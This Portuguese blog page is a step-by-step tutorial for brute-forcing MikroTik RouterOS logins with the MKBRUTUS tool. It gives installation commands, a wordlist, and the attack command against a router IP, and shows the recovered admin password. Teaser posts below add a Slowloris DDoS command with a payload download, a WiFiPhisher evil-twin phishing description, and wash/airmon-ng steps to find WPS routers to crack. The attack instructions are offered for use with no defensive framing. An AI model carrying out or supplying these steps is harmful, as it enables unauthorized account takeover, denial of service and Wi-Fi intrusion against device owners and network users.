Pular para o conteúdo principal

MKBRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.





O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Desenvolvedores:
Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire
Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa
Projeto: github.com/mkbrutusproject/mkbrutus
01 Passo
Verifique a versão atual do python em seguida realiza a instalação da versão 3
root@kali:~# python –version (Exibe a versão do Python)
root@kali:~# apt-get install python3 (Realiza a instalação do Python 3)
mkbrutus01
02 Passo
Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da versão 3 foi realizada com sucesso.
root@kali:~# python –version (Exibe a versão do Python)
mkbrutus02
03 Passo
Realize o download do projeto mkbrutus
root@kali:~# git clone https://github.com/mkbrutusproject/mkbrutus
mkbrutus03
04 Passo
Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.
root@kali:~# chmod -R 755 mkbrutus/
root@kali:~# cd mkbrutus/
root@kali:~/mkbrutus# ls -l
mkbrutus04
05 Passo
Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.
root@kali:~/mkbrutus# python3 mkbrutus.py -h
-h : Help (Ajuda)
mkbrutus05
06 Passo
São apresentadas todas as opções que a ferramenta mkbrutus disponibiliza.
mkbrutus06
07 Passo
Crie um arquivo de senhas ou realize o download de uma lista nos sites:
Lista: wiki.skullsecurity.org/Passwords
Lista: wordlist.sourceforge.net
root@kali:~/mkbrutus# vim senhas.txt
mkbrutus07
Conteúdo do arquivo senhas.txt
mkbrutus08
08 Passo
Realize o ataque no equipamento utilizando os seguintes parâmetros.
root@kali:~/mkbrutus# python3 mkbrutus.py -t 192.168.0.1 -d senhas.txt
mkbrutus.py : Ferramenta de Brute Force
192.168.0.1 : IP do Roteador MikroTik
senhas.txt : Arquivo de Senhas(Wordlist)
O ataque é realizado com sucesso e o usuário e a senha são revelados:
Usuário: admin
Senha: P@ssw0rd
mkbrutus09

Comentários

Postagens mais visitadas deste blog

Realizar DDos Attack usando Slowloris

Salve esse arquivo como "slowloris.pl". Download do script. http://pastebin.com/2M4ZAHpz Abra o terminal e siga os seguintes comandos:   cd Desktop                    ( o local deve ser substituído pelo local do arquivo, nesse caso se encontra no Desktop ) chmod +x slowloris.pl perl ./slowloris.pl -dns www.target.com -port 80 -timeout 1 -num 1000 -cache 1- Substitua a URL pelo endereço do alvo. 2- Nesse caso será disparado 1000 pacotes a cada 1 segundo.

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de

Como encontrar a WPS Routers Habilitados - Kali Linux

Como você poderia encontrar WPS Routers ativado?  Sério é muito fácil de encontrar WPS habilitado roteadores, mas depois que eu postei o meu tutorial sobre como cortar o WPA / WPA2 WiFi Protected muitos povos me enviado mensagens para saber como eles poderiam encontrar WPS habilitado router? por isso é muito simples e limitado a um comando único sim, vamos usar o comando de lavagem para esse fim. O comando que podemos utilizar para encontrar WPS habilitado roteadores está abaixo. wash -i mon0 -C Tenha em mente que o "C" neste alfabeto "C" deve ser a capital Também tenha em mente antes de entrar este comando por favor ligar o interface de moniter ou este comando não funciona mais assim para que você moniter tipo de interface o comando abaixo primeiro e depois tentar digitalizar routers WPS habilitados. airmon-ng start wlan0  Agora isso vai lhe dar todos os roteadores que possuem botão WPS / push ativado em cima delas e você pode tentar cortar-lhes a seu p